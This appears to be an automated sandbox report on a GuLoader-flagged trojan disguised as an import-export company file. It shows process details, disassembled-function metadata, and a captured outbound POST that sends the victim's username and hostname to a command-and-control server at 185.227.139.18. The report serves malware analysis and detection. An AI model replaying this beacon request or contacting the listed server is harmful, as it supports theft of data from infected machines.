3	192.168.2.3	49756	185.227.139.18	80	C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 08:12:30.628950119 CEST	5908	OUT	POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 185.227.139.18 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 976E9D7A Content-Length: 163 Connection: close
Aug 3, 2021 08:12:30.783184052 CEST	5908	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 38 00 31 00 35 00 39 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz181598DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 3, 2021 08:12:31.508862972 CEST	5910	IN	HTTP/1.1 404 Not Found Date: Tue, 03 Aug 2021 06:12:30 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
Aug 3, 2021 08:12:31.508893013 CEST	5911	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
Aug 3, 2021 08:12:31.509071112 CEST	5913	IN	Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
Aug 3, 2021 08:12:31.509094954 CEST	5914	IN	Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
Aug 3, 2021 08:12:31.509356976 CEST	5915	IN	Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
Aug 3, 2021 08:12:31.509377003 CEST	5917	IN	Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
Aug 3, 2021 08:12:31.509663105 CEST	5918	IN	Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
Aug 3, 2021 08:12:31.509704113 CEST	5919	IN	Data Raw: 2d 69 6e 66 6f 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e Data Ascii: -info"> <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-ima

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: KHAWATMI CO.IMPORT & EXPORT.exe PID: 5804 Parent PID: 5700

General

Start time:	08:06:08
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
Imagebase:	0x400000
File size:	147456 bytes
MD5 hash:	0153AE8CF4B1F546721332B5CB3F973C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: KHAWATMI CO.IMPORT & EXPORT.exe PID: 6316 Parent PID: 5804

General

Start time:	08:09:12
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
Imagebase:	0x400000
File size:	147456 bytes
MD5 hash:	0153AE8CF4B1F546721332B5CB3F973C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: KHAWATMI CO.IMPORT & EXPORT.exe PID: 5804 Parent PID: 5700 KHAWATMI CO.IMPORT & EXPORT.exeCOMMON

Executed Functions

Function 03D10F36, Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 815COMMON

Download Yara Rule

Strings

ZC]?, xrefs: 03D1119C
-(Re, xrefs: 03D1163C
c3ZD, xrefs: 03D11506
w49=, xrefs: 03D11622
mJ~, xrefs: 03D11617
D_', xrefs: 03D11174

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: D_'$-(Re$ZC]?$c3ZD$mJ~$w49=
API String ID: 2167126740-3012229022
Opcode ID: dbf72de3164d7a0a454a4018c97ce36c1113cf232070476386dc965c6730ec62
Instruction ID: 70f330cd3118c3bafc8efdf901b671e2a84a9a3d58ec62c8925fee9eadbc6969
Opcode Fuzzy Hash: dbf72de3164d7a0a454a4018c97ce36c1113cf232070476386dc965c6730ec62
Instruction Fuzzy Hash: 94622471A08388AFDB74DF38DC54BEE77A2EF85310F59852AEC899B254D3308991CB45

Uniqueness

Uniqueness Score: -1.00%

Function 03D10F77, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 456COMMON

Download Yara Rule

Strings

ZC]?, xrefs: 03D1119C
-(Re, xrefs: 03D1163C
c3ZD, xrefs: 03D11506
w49=, xrefs: 03D11622
mJ~, xrefs: 03D11617
D_', xrefs: 03D11174

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: D_'$-(Re$ZC]?$c3ZD$mJ~$w49=
API String ID: 0-3012229022
Opcode ID: ab8d4188e61cd0a83bdeeb4416c766054770f3430567df5cef1b870f022d4cb1
Instruction ID: 24e48f9f8453d45760592c04cf664ddeedc8c7ba767d2b65ca9a234686e9b5a8
Opcode Fuzzy Hash: ab8d4188e61cd0a83bdeeb4416c766054770f3430567df5cef1b870f022d4cb1
Instruction Fuzzy Hash: F2023471A08388AFDB34DF28DC54BEEBBE2AF45310F59812EDC899B654D3305A85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03D10F51, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 434COMMON

Download Yara Rule

Strings

ZC]?, xrefs: 03D1119C
-(Re, xrefs: 03D1163C
c3ZD, xrefs: 03D11506
w49=, xrefs: 03D11622
mJ~, xrefs: 03D11617
D_', xrefs: 03D11174

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: D_'$-(Re$ZC]?$c3ZD$mJ~$w49=
API String ID: 0-3012229022
Opcode ID: d8e701c86454c5fe01f767b2da939f814a794f0bf7a23c3b99022a294e292726
Instruction ID: 78f095d6a0b880cfb606a364d8b20158cf72cadb9e5049a24ceb03a79746fb8e
Opcode Fuzzy Hash: d8e701c86454c5fe01f767b2da939f814a794f0bf7a23c3b99022a294e292726
Instruction Fuzzy Hash: 04F10371A08388AFDB34DF389C587EE77E2AF85310F59412EEC899B254D7309A85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03D11107, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 389COMMON

Download Yara Rule

Strings

ZC]?, xrefs: 03D1119C
-(Re, xrefs: 03D1163C
c3ZD, xrefs: 03D11506
w49=, xrefs: 03D11622
mJ~, xrefs: 03D11617
D_', xrefs: 03D11174

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: D_'$-(Re$ZC]?$c3ZD$mJ~$w49=
API String ID: 0-3012229022
Opcode ID: 742988ec735f6c74086af7cb9b267e40aaca00f170572f25c88d68c046f25ffc
Instruction ID: 32fc7615076e2ab14072d94f6218e89ca7721d72d1e1a093f50b0ed9879a3489
Opcode Fuzzy Hash: 742988ec735f6c74086af7cb9b267e40aaca00f170572f25c88d68c046f25ffc
Instruction Fuzzy Hash: 95E14571A08388AFDB34DF38D854BEEB7E2AF45310F59811EDC899B654D3319985CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03D111F5, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 359COMMON

Download Yara Rule

Strings

-(Re, xrefs: 03D1163C
c3ZD, xrefs: 03D11506
w49=, xrefs: 03D11622
mJ~, xrefs: 03D11617

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: -(Re$c3ZD$mJ~$w49=
API String ID: 1029625771-3961414713
Opcode ID: 579a6b87b7e622ee3b3b12a58d24b7b6108c922fbb8cb88e1be9ce6bce0811b8
Instruction ID: 8d1ae88b43ca0cd507047dd8b5be154578620a0c50f2db273fbe99173a582171
Opcode Fuzzy Hash: 579a6b87b7e622ee3b3b12a58d24b7b6108c922fbb8cb88e1be9ce6bce0811b8
Instruction Fuzzy Hash: 4AD15571A08388AFDB30DF38D855BEEBBE2AF45310F59812EDC898B654D3309985CB45

Uniqueness

Uniqueness Score: -1.00%

Function 03D1131A, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 316COMMON

Download Yara Rule

Strings

-(Re, xrefs: 03D1163C
c3ZD, xrefs: 03D11506
w49=, xrefs: 03D11622
mJ~, xrefs: 03D11617

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -(Re$c3ZD$mJ~$w49=
API String ID: 0-3961414713
Opcode ID: 4bd580b703bd356f494c0c01b24f8f0deb9ba50c78cda80e492dc090fb7d8eb2
Instruction ID: b83efa09a6c487be0463b1990c6a6f7754f479cd388573d800a7e20854e158e2
Opcode Fuzzy Hash: 4bd580b703bd356f494c0c01b24f8f0deb9ba50c78cda80e492dc090fb7d8eb2
Instruction Fuzzy Hash: E2C16471A08388AFDB34CF38D855BEEBBA2FF41310F59852DD88A8B654D3319985CB45

Uniqueness

Uniqueness Score: -1.00%

Function 03D1141F, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 274COMMON

Download Yara Rule

Strings

-(Re, xrefs: 03D1163C
c3ZD, xrefs: 03D11506
w49=, xrefs: 03D11622
mJ~, xrefs: 03D11617

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -(Re$c3ZD$mJ~$w49=
API String ID: 0-3961414713
Opcode ID: f827708ed4ceefe70a93e281cf383969992c73a7b2c0fa7df7b0da2cf245bbfc
Instruction ID: fff75436c2770f93ade78c72cfe2481db68dbd279514654f195f46855d2c2c8a
Opcode Fuzzy Hash: f827708ed4ceefe70a93e281cf383969992c73a7b2c0fa7df7b0da2cf245bbfc
Instruction Fuzzy Hash: C6A17531908388ABDB34CF38D859BEEBBA2BF41310F69851EDC898B695D3315985CB45

Uniqueness

Uniqueness Score: -1.00%

Function 03D1A932, Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 801nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(C6B71DC6,0000006B,?,?,?,03D19E26), ref: 03D1AA0E

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: ^n(D
API String ID: 2706961497-1681091204
Opcode ID: a6b1943638f47f72bf6642853510deea45254aadd96746f59beb909c4a8d90a1
Instruction ID: aa0d4e02a2302d7fd9d31014a6c8ce9dfbf39c20a46c12e750cf815f64ae378a
Opcode Fuzzy Hash: a6b1943638f47f72bf6642853510deea45254aadd96746f59beb909c4a8d90a1
Instruction Fuzzy Hash: 88721EB2604389AFDB74DF28DC847DAB7B2FF99310F15811ADC899B214D3349A91CB52

Uniqueness

Uniqueness Score: -1.00%

Function 03D11546, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

Strings

-(Re, xrefs: 03D1163C
w49=, xrefs: 03D11622
mJ~, xrefs: 03D11617

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -(Re$mJ~$w49=
API String ID: 0-1142955810
Opcode ID: 82b566504a90b8a6f77f23a4d853592447f722c73b96af06cce91d24973666b0
Instruction ID: 7a10076d53c513f08047e35b458da28b4937549a919189b5a5cd0b4b4cc195dd
Opcode Fuzzy Hash: 82b566504a90b8a6f77f23a4d853592447f722c73b96af06cce91d24973666b0
Instruction Fuzzy Hash: 5691D931908389AFDB31CF38D858BEEBBA0FF02310F59865ED8998B695D3315595CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03D16BFE, Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 875COMMON

Download Yara Rule

Strings

^n(D, xrefs: 03D153C7
db?y, xrefs: 03D16F3D

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: ^n(D$db?y
API String ID: 2167126740-1261573688
Opcode ID: 4546f04a85c6431b483342e3a5365844600e042bab630434a56795c753fb58c6
Instruction ID: a983620d8eb7dcaedd626b302ecdea22a1bce4b0dda7f2a454b5629e543267dd
Opcode Fuzzy Hash: 4546f04a85c6431b483342e3a5365844600e042bab630434a56795c753fb58c6
Instruction Fuzzy Hash: 23820DB260438AAFDB749F28DC447EAB7B2FF85310F55811EDC899B214D3349A91CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03D1347D, Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1218COMMON

Download Yara Rule

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: ^n(D
API String ID: 1029625771-1681091204
Opcode ID: 91f6c031e8d74daf3a25b04c6ef2657b12c711267022dde30fd0fed3c98172ca
Instruction ID: 5bb42e9ca8e5af5a7cb2024d11574ac0830d539edf975b7c697c50e233532b38
Opcode Fuzzy Hash: 91f6c031e8d74daf3a25b04c6ef2657b12c711267022dde30fd0fed3c98172ca
Instruction Fuzzy Hash: C2B2DFB1604349AFDB74DF28DC84BEAB7B2FF89310F558229DC899B210D7359A90CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03D19D8D, Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1194COMMON

Download Yara Rule

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: ^n(D
API String ID: 3389902171-1681091204
Opcode ID: 8773892b81cd50652f4d9873f4bedf2d2ef9d2da3c6c57e738dd2ebee82b11b9
Instruction ID: 79073e3e753e0bbcbe4e6a245caab6845ffc2976bedeb8e3c8dc6027fe84a1be
Opcode Fuzzy Hash: 8773892b81cd50652f4d9873f4bedf2d2ef9d2da3c6c57e738dd2ebee82b11b9
Instruction Fuzzy Hash: 78B232716083859FDB74CF38DC887DABBA2FF56310F49825ADC898B255D3748A81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 03D145CD, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 813COMMON

Download Yara Rule

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ^n(D
API String ID: 0-1681091204
Opcode ID: 6a33d17cb9acde2012f45ca68e8811b7c2119730907dc40ba7f53099d2bbdf9c
Instruction ID: 0ea68525260ea38ef452d6870adcf7e4752f87e65c2bcc60dd142414f54882c5
Opcode Fuzzy Hash: 6a33d17cb9acde2012f45ca68e8811b7c2119730907dc40ba7f53099d2bbdf9c
Instruction Fuzzy Hash: 8B723EB2604349AFDB74DF28DC84BEABBB2FF95310F55811ADC899B214D3349A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03D10BEC, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 796COMMON

Download Yara Rule

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: ^n(D
API String ID: 1029625771-1681091204
Opcode ID: b3614f1fd08cfd7a101ae316f3a52447854561c7280c509c3faa7c60bb83b194
Instruction ID: b6b530aa2090e49372ae58221953675e0e7b6c307c147186b2c7732a47f3b9be
Opcode Fuzzy Hash: b3614f1fd08cfd7a101ae316f3a52447854561c7280c509c3faa7c60bb83b194
Instruction Fuzzy Hash: D07230B1604389AFDB74DF28DC857EA77B2FF99310F14812ADC899B214D3349A91CB52

Uniqueness

Uniqueness Score: -1.00%

Function 03D1611B, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 757COMMON

Download Yara Rule

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: ^n(D
API String ID: 2167126740-1681091204
Opcode ID: 00467e68780ac7d3b692599df6d7776376da680881ee357aa81ff99cf20a0cec
Instruction ID: cea5f90ea147dbd0c9de66ac758e2698e4c1171db3ec2e479f7419989ab8d75f
Opcode Fuzzy Hash: 00467e68780ac7d3b692599df6d7776376da680881ee357aa81ff99cf20a0cec
Instruction Fuzzy Hash: 0D622EB2604349AFDB74DF24DC847EABBB2FF95310F15811ADC899B214D3349A91CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03D1B4F9, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 701COMMON

Download Yara Rule

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ^n(D
API String ID: 0-1681091204
Opcode ID: 7c7861199a4d9d9d02d0e36cba45c8de74868f2be89257c6a0212e29ea013808
Instruction ID: 1730b97bd8cac0ad7f834e3a161ff18609a0add0108e80ac21cf46afa8dbfa29
Opcode Fuzzy Hash: 7c7861199a4d9d9d02d0e36cba45c8de74868f2be89257c6a0212e29ea013808
Instruction Fuzzy Hash: 77522DB2604349AFDB74CF28DC847DABBB2FF85310F55821ADC899B214D3349A91CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03D14CD1, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 700librarynativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0
LoadLibraryA.KERNELBASE(?,?,?,00000000,?,-6AFEEF8C,03D16A21,00000000,?,?), ref: 03D18923

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: ^n(D
API String ID: 3569954152-1681091204
Opcode ID: dbcaf389765f927f41fedd9c3881e9a167dd8d9f69122c28e5cc2636475e6dac
Instruction ID: 57ac8c1626812a9775e451198d63a77dff029ae225c0ab86fd03ab78d1dc8d45
